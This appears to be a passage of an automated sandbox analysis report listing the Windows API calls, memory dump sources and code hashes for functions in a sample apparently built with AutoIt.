                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0030948E
                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00309495
                                                                                                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 003094AE
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,0030904D), ref: 003094C2
                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 003094C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3008561057-0
                                                                                                                                                                • Opcode ID: fa77e30d6cea632fdbe5225301ccd18ecb5ecff22e3c36b6614aaba004d5b080
                                                                                                                                                                • Instruction ID: 0f32f91d87b13e6e95ebfa2e41dd19ead5c20ccf632be0dbdc279fca7bafa25e
                                                                                                                                                                • Opcode Fuzzy Hash: fa77e30d6cea632fdbe5225301ccd18ecb5ecff22e3c36b6614aaba004d5b080
                                                                                                                                                                • Instruction Fuzzy Hash: B211E175602204FFDB16CFA5CC19BAF7BADFB42311F108019E9819B251CB35A901CB60
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00309200
                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00309207
                                                                                                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00309216
                                                                                                                                                                • CloseHandle.KERNEL32(00000004), ref: 00309221
                                                                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00309250
                                                                                                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00309264
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1413079979-0
                                                                                                                                                                • Opcode ID: 4ef455d700801a023b54c948d721e92225145084ec0c6d8a7cb507ddfee2eca0
                                                                                                                                                                • Instruction ID: a91f13eeac6dca995313542565373c2681e5480928cf39530d969392d55c38f0
                                                                                                                                                                • Opcode Fuzzy Hash: 4ef455d700801a023b54c948d721e92225145084ec0c6d8a7cb507ddfee2eca0
                                                                                                                                                                • Instruction Fuzzy Hash: 5F11477660120EABDB128FA4ED49BDA7BADEB09304F054015FE04A61A1C6769D60EB61
                                                                                                                                                                APIs
                                                                                                                                                                • GetDC.USER32(00000000), ref: 0030C34E
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0030C35F
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0030C366
                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0030C36E
                                                                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0030C385
                                                                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0030C397
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                                • Opcode ID: 2dddcf223c8848ba3fc7c79810213487388d788b22ada23cebdf1bf11bb4bbba
                                                                                                                                                                • Instruction ID: ec59a0b61089de350de84a060f2ce2c0bb26283fbd6697116eee8898c04fea7e
                                                                                                                                                                • Opcode Fuzzy Hash: 2dddcf223c8848ba3fc7c79810213487388d788b22ada23cebdf1bf11bb4bbba
                                                                                                                                                                • Instruction Fuzzy Hash: 8D012575E01214BBDB115BA59C45A5ABFA8EB49751F004065FE04AB280DA74A910CF90
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002B1729
                                                                                                                                                                  • Part of subcall function 002B16CF: SelectObject.GDI32(?,00000000), ref: 002B1738
                                                                                                                                                                  • Part of subcall function 002B16CF: BeginPath.GDI32(?), ref: 002B174F
                                                                                                                                                                  • Part of subcall function 002B16CF: SelectObject.GDI32(?,00000000), ref: 002B1778
                                                                                                                                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0033C57C
                                                                                                                                                                • LineTo.GDI32(00000000,00000003,?), ref: 0033C590
                                                                                                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0033C59E
                                                                                                                                                                • LineTo.GDI32(00000000,00000000,?), ref: 0033C5AE
                                                                                                                                                                • EndPath.GDI32(00000000), ref: 0033C5BE
                                                                                                                                                                • StrokePath.GDI32(00000000), ref: 0033C5CE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 43455801-0
                                                                                                                                                                • Opcode ID: 19abeffd46e5c89409bad38c07de91f0dd5dcc9c2d3c8b6e09e8de3e2e15856b
                                                                                                                                                                • Instruction ID: fd4aaa3251c725c37610742832b5bd24b0a88873efdfb0a135fef71386fbe65b
                                                                                                                                                                • Opcode Fuzzy Hash: 19abeffd46e5c89409bad38c07de91f0dd5dcc9c2d3c8b6e09e8de3e2e15856b
                                                                                                                                                                • Instruction Fuzzy Hash: D6111B7610010CBFEF129F91DC88FEA7FADEF09354F048011BA189A161CB71AE95DBA0
                                                                                                                                                                APIs
                                                                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002D07EC
                                                                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 002D07F4
                                                                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002D07FF
                                                                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002D080A
                                                                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 002D0812
                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 002D081A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4278518827-0
                                                                                                                                                                • Opcode ID: b4e223a7f3ccaf478c7e675b82086ace09f0cb6ae7742c3213fc5fb216349fd7
                                                                                                                                                                • Instruction ID: d638b36b23640f940b30660d3328febbbb3de4be47c6c304226dc4b9c969ba0e
                                                                                                                                                                • Opcode Fuzzy Hash: b4e223a7f3ccaf478c7e675b82086ace09f0cb6ae7742c3213fc5fb216349fd7
                                                                                                                                                                • Instruction Fuzzy Hash: F1016CB09027597DE3008F5A8C85B52FFA8FF59354F00411BA15C4B941C7F5A868CBE5
                                                                                                                                                                APIs
                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003159B4
                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003159CA
                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 003159D9
                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003159E8
                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003159F2
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003159F9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 839392675-0
                                                                                                                                                                • Opcode ID: 864f9bc560bb338f400597d8a31e3e3728e5d50735be0b424cf41bc3a08e61c6
                                                                                                                                                                • Instruction ID: bdf766b1e7968deb972f893c8560249b60b21cb338e85ef471a7578b88031053
                                                                                                                                                                • Opcode Fuzzy Hash: 864f9bc560bb338f400597d8a31e3e3728e5d50735be0b424cf41bc3a08e61c6
                                                                                                                                                                • Instruction Fuzzy Hash: 1BF01D3A241158BBE7265B929C0DEEF7E7CEBCBB11F010159FA0595050DBB42A1186B5
                                                                                                                                                                APIs
                                                                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 003177FE
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,002BC2B6,?,?), ref: 0031780F
                                                                                                                                                                • TerminateThread.KERNEL32(00000000,000001F6,?,002BC2B6,?,?), ref: 0031781C
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,002BC2B6,?,?), ref: 00317829
                                                                                                                                                                  • Part of subcall function 003171F0: CloseHandle.KERNEL32(00000000,?,00317836,?,002BC2B6,?,?), ref: 003171FA
                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0031783C
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,002BC2B6,?,?), ref: 00317843
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3495660284-0
                                                                                                                                                                • Opcode ID: 6c63a9fdab49607f21c3bff0bf92cdb4f97b08e7434a30683ad8373e2cd4b8ab
                                                                                                                                                                • Instruction ID: 815e51ff21f0b25eeaa25df7a7cbc12d16633c7cc826fc7c062136cd2c679a9b
                                                                                                                                                                • Opcode Fuzzy Hash: 6c63a9fdab49607f21c3bff0bf92cdb4f97b08e7434a30683ad8373e2cd4b8ab
                                                                                                                                                                • Instruction Fuzzy Hash: 0EF0303A255211ABD71B2B54EC8DAEE777DBB4A701F150821F203990B18FB56841CB50
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00309555
                                                                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 00309561
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0030956A
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00309572
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0030957B
                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00309582
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 146765662-0
                                                                                                                                                                • Opcode ID: 4b97eb5733db3bb5bb1e79d3d5ed47bd139d7a202888d6bc0b5fc51bfbad53fe
                                                                                                                                                                • Instruction ID: 383994e7f08ff8d10bc67779bc25abeaf9c2cfd3f09fa34b11eb15d7e7270761
                                                                                                                                                                • Opcode Fuzzy Hash: 4b97eb5733db3bb5bb1e79d3d5ed47bd139d7a202888d6bc0b5fc51bfbad53fe
                                                                                                                                                                • Instruction Fuzzy Hash: EFE0C23E204101BBDA461FE1EC0C95ABF2DFB4A722B104620F71589470CF32A460DB50
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00307D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307C62,80070057,?,?,?,00308073), ref: 00307D45
                                                                                                                                                                  • Part of subcall function 00307D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307C62,80070057,?,?), ref: 00307D60
                                                                                                                                                                  • Part of subcall function 00307D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307C62,80070057,?,?), ref: 00307D6E
                                                                                                                                                                  • Part of subcall function 00307D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307C62,80070057,?), ref: 00307D7E
                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00329EF0
                                                                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0032A06C
                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0032A077
                                                                                                                                                                Strings
                                                                                                                                                                • NULL Pointer assignment, xrefs: 0032A0C5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                                                                • API String ID: 4175897753-2785691316
                                                                                                                                                                • Opcode ID: dea22c26fb80dfa986193da25242fd963ce4fcb70709603297f5317224d05494
                                                                                                                                                                • Instruction ID: 83b47579e7ccc36b1f04aee787fd3321f48c69b45878f2cba9d838f926dc1bfd
                                                                                                                                                                • Opcode Fuzzy Hash: dea22c26fb80dfa986193da25242fd963ce4fcb70709603297f5317224d05494
                                                                                                                                                                • Instruction Fuzzy Hash: B3913871D00229EBDB11DFA4D841EDEBBB9FF09310F10815AF519A7281DB71AA54CFA1
                                                                                                                                                                APIs
                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00328CFD
                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00328E0C
                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00328F84
                                                                                                                                                                  • Part of subcall function 00317B1D: VariantInit.OLEAUT32(00000000), ref: 00317B5D
                                                                                                                                                                  • Part of subcall function 00317B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00317B66
                                                                                                                                                                  • Part of subcall function 00317B1D: VariantClear.OLEAUT32(00000000), ref: 00317B72
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                • API String ID: 4237274167-1221869570
                                                                                                                                                                • Opcode ID: ee8407b133aada0b546aac2f87bffda1cf96e25e4f4f8cf1e60300e8b9ed9ddf
                                                                                                                                                                • Instruction ID: ae6878bba4c28c4e4db80c71380fcab9ef323e3e868fccd64b176ab18d0400bc
                                                                                                                                                                • Opcode Fuzzy Hash: ee8407b133aada0b546aac2f87bffda1cf96e25e4f4f8cf1e60300e8b9ed9ddf
                                                                                                                                                                • Instruction Fuzzy Hash: 7C919E746083019FC701DF24D48195ABBF5EF99354F14896EF88A8B3A2DB30E945CF92
                                                                                                                                                                APIs
                                                                                                                                                                • CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00328A0E,?,00000000), ref: 0033DF71
                                                                                                                                                                • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00328A0E,?,00000000,00000000), ref: 0033DFA7
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 0033DFB8
                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00328A0E,?,00000000,00000000), ref: 0033E03A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                • String ID: DllGetClassObject
                                                                                                                                                                • API String ID: 753597075-1075368562
                                                                                                                                                                • Opcode ID: 314a77c8150918067fa78c4224de21a48180be5ded6030bdf97cb7438b1b3013
                                                                                                                                                                • Instruction ID: bea6d076356dd4be3daa1233eb56deb0eeb4dbfeb40efaa1edfa848cf805f28e
                                                                                                                                                                • Opcode Fuzzy Hash: 314a77c8150918067fa78c4224de21a48180be5ded6030bdf97cb7438b1b3013
                                                                                                                                                                • Instruction Fuzzy Hash: 75417F76600205EFDB1ACF56D8C4AAA7BA9EF44310F1481AAED059F285D7F1DD44CFA0
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00337976
                                                                                                                                                                • IsMenu.USER32(?), ref: 0033798E
                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003379D6
                                                                                                                                                                • DrawMenuBar.USER32 ref: 003379E9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 3076010158-4108050209
                                                                                                                                                                • Opcode ID: e8769238891310ba0c4c5240c83828dd2a2c4d3a63cb315d045999187d96ef98
                                                                                                                                                                • Instruction ID: 6d0d6b4134ec0bdd73c9708d4fce74dbc263c7559b895c3a97141336be7a5265
                                                                                                                                                                • Opcode Fuzzy Hash: e8769238891310ba0c4c5240c83828dd2a2c4d3a63cb315d045999187d96ef98
                                                                                                                                                                • Instruction Fuzzy Hash: 40415CB5A08209EFDB21DF54D884F9ABBF9FF0A351F058269E9559B250C730AD50CFA0
                                                                                                                                                                APIs
                                                                                                                                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0032DEAE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BuffCharLower
                                                                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                • API String ID: 2358735015-567219261
                                                                                                                                                                • Opcode ID: ad8f50d5e0bd4f006b69fa984e6b9e570f7e786b0e2cb6c1c02b9f6508ac5a21
                                                                                                                                                                • Instruction ID: 67de3ba86fe8fd256f78b627bad19711013b253ec592183066aaef5fae8b3e14
                                                                                                                                                                • Opcode Fuzzy Hash: ad8f50d5e0bd4f006b69fa984e6b9e570f7e786b0e2cb6c1c02b9f6508ac5a21
